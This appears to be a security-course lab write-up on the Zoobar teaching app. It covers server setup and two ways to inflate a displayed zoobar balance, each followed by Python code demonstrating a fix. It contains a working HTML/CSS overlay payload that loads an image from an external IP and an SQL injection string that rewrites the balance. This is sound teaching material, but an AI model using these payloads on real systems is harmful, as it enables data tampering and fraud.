Information Security Practice Lab2-CSS
Installing php5.6, php5.6-mysql, apache2 and mysql5.7 on Ubuntu 20.04
Install php5.6, php5.6-mysql and apache2
sudo apt-get install -y language-pack-en-base
sudo LC_ALL=en_US.UTF-8 add-apt-repository ppa:ondrej/php
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
sudo apt-get install php5.6
sudo apt-get install php5.6-mysql
sudo apt-get install apache2
sudo a2dismod php7.4
sudo a2enmod php5.6
sudo service apache2 restart
Install mysql5.7
Problem 1
Problem 2: Finding vulnerabilities in the Zoobar website
Manage your profile in the zoobar website, make your zoobars appear more than you really own. That is, after you modify your profile, when others or yourself look up your profile, they will see more zoobars than you actually own.
Method 1: using CSS
- Enter the following in user a's profile:
<img src="http://106.13.136.87:8080/100.png" style="position:relative;top:-55px;right:-63px;width:34px;height:21px"/>
- When user b then enters the username a under User, b will see that a has 100 zoobars, although a does not actually have 100.
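The overlay works only because the profile is echoed into the page as raw HTML, so a positioned <img> can be drawn on top of the real zoobar count. The following is an added example (my own Python, not Zoobar's code) of the usual mitigation: an allow-list sanitizer that keeps a handful of bare formatting tags, drops every attribute (so no style and no src survive), and escapes everything else so the payload above is shown as literal text instead of being rendered. The class name ProfileSanitizer and the function sanitize_profile are assumed names for this example.

```python
import html
from html.parser import HTMLParser

# Tags a profile may keep. No img, no attributes of any kind: the overlay above
# depended on an <img> carrying a style attribute, and neither survives this list.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br"}


class ProfileSanitizer(HTMLParser):
    """Allow-list sanitizer: keeps bare allowed tags, escapes everything else as text."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.parts = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.parts.append("<%s>" % tag)          # attributes are dropped
        else:
            # Disallowed tag: re-emit its raw text escaped, so it renders as text.
            self.parts.append(html.escape(self.get_starttag_text()))

    def handle_startendtag(self, tag, attrs):
        # Self-closing form, e.g. the <img .../> from the writeup.
        if tag in ALLOWED_TAGS:
            self.parts.append("<%s>" % tag)
        else:
            self.parts.append(html.escape(self.get_starttag_text()))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.parts.append("</%s>" % tag)
        else:
            self.parts.append(html.escape("</%s>" % tag))

    def handle_data(self, data):
        self.parts.append(html.escape(data))       # plain text is always escaped

    def handle_entityref(self, name):
        self.parts.append("&%s;" % name)           # already-encoded entities pass through

    def handle_charref(self, name):
        self.parts.append("&#%s;" % name)

    def handle_comment(self, data):
        pass                                       # comments, declarations and PIs are dropped

    def handle_decl(self, decl):
        pass

    def handle_pi(self, data):
        pass

    def unknown_decl(self, data):
        pass


def sanitize_profile(raw):
    """Return the profile HTML reduced to the allow-list; safe to embed in the page."""
    parser = ProfileSanitizer()
    parser.feed(raw)
    parser.close()
    return "".join(parser.parts)


if __name__ == "__main__":
    # Constructed input: the overlay payload from the writeup.
    payload = ('<img src="http://106.13.136.87:8080/100.png" '
               'style="position:relative;top:-55px;right:-63px;width:34px;height:21px"/>')
    print(sanitize_profile(payload))
    print(sanitize_profile('<b style="color:red">hi</b> &amp; <em>there</em>'))
```

Run the sanitizer on the stored profile at output time (or once at save time and again at output time as defense in depth); with the tag and its style attribute neutralised there is nothing left that can be positioned over the zoobar counter.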
Method 2: SQL injection
- In the source code, the SQL statement that handles the $profile parameter is:
$sql = "UPDATE Person SET Profile='$profile' ". "WHERE PersonID=$user->id";
- Suppose the first user, a, enters the following in the profile:
',Zoobars=9999,Profile='Welcome to my profile!
- The SQL that is finally executed is:
UPDATE Person SET Profile='',Zoobars=9999,Profile='Welcome to my profile!' WHERE PersonID=1;
- Looking up a's balance afterwards shows 9999 zoobars.
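The fix is to stop building the UPDATE by string concatenation and to bind $profile as a parameter (in PHP 5.6 that means a mysqli or PDO prepared statement). The following added example (my own Python, not the Zoobar code) reproduces the statement above against an in-memory SQLite table and shows the two behaviours side by side: the same input changes Zoobars when spliced into the SQL text, and is stored as a plain string when bound. The table contents, the user id 1 and the names make_db, update_profile_vulnerable, update_profile_safe and get_person are constructed for this example.

```python
import sqlite3

# The profile text from the writeup (user-controlled input).
PAYLOAD = "',Zoobars=9999,Profile='Welcome to my profile!"


def make_db():
    """Constructed stand-in for the Zoobar Person table, with one user owning 10 zoobars."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Person (PersonID INTEGER PRIMARY KEY, Username TEXT, "
        "Profile TEXT, Zoobars INTEGER)"
    )
    conn.execute("INSERT INTO Person VALUES (1, 'a', '', 10)")
    conn.commit()
    return conn


def update_profile_vulnerable(conn, user_id, profile):
    """Same construction as the PHP line: the profile is spliced into the SQL text."""
    sql = "UPDATE Person SET Profile='" + profile + "' WHERE PersonID=" + str(user_id)
    # The result is still a single statement, so execute() runs it. The injected
    # ",Zoobars=9999," becomes an extra assignment, and the duplicated Profile=
    # assignment is resolved rightmost-wins (SQLite and MySQL both do this).
    conn.execute(sql)
    conn.commit()
    return sql


def update_profile_safe(conn, user_id, profile):
    """Hardened form: the profile travels as a bound parameter, never as SQL text."""
    sql = "UPDATE Person SET Profile=? WHERE PersonID=?"
    conn.execute(sql, (profile, user_id))
    conn.commit()
    return sql


def get_person(conn, user_id):
    """Read back the row so both paths can be compared."""
    row = conn.execute(
        "SELECT Profile, Zoobars FROM Person WHERE PersonID=?", (user_id,)
    ).fetchone()
    return {"profile": row[0], "zoobars": row[1]}


if __name__ == "__main__":
    db = make_db()
    print(update_profile_vulnerable(db, 1, PAYLOAD))
    print("vulnerable:", get_person(db, 1))   # Zoobars jumps to 9999
    db = make_db()
    update_profile_safe(db, 1, PAYLOAD)
    print("safe:      ", get_person(db, 1))   # Zoobars stays 10, payload stored verbatim
```

The safe version does not try to escape quotes in the input; it never lets the input reach the SQL parser at all, which is why the quote and the extra assignment end up as ordinary characters inside the stored profile.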